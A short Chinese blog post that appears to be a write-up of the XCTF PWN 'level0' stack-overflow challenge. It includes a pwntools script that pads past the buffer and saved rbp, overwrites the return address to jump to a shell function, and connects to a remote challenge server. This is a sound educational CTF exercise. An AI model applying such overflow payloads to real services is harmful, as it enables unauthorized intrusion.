XCTF-PWN-level0-基础栈溢出

CTF · 03-21 · 78 人浏览

1.查看文件保护机制

Pasted image 20231215171744.png
只开启了NX(数据不可执行)

解题脚本:

from pwn import *
r = remote("61.147.171.105", 64191)
payload = "A" * 0x80 + "a" * 0x8 + p64(0x00400596).decode("iso-8859-1")
# 注意这里的payload填充0x80后还需要填充8个字节(64位)的数据来覆盖rbp,之后才是覆盖retn
r.recvuntil("Hello, World\n")

r.sendline(payload)
r.interactive()

CTF PWN 栈溢出 XCTF
Theme Jasmine by Kent Liao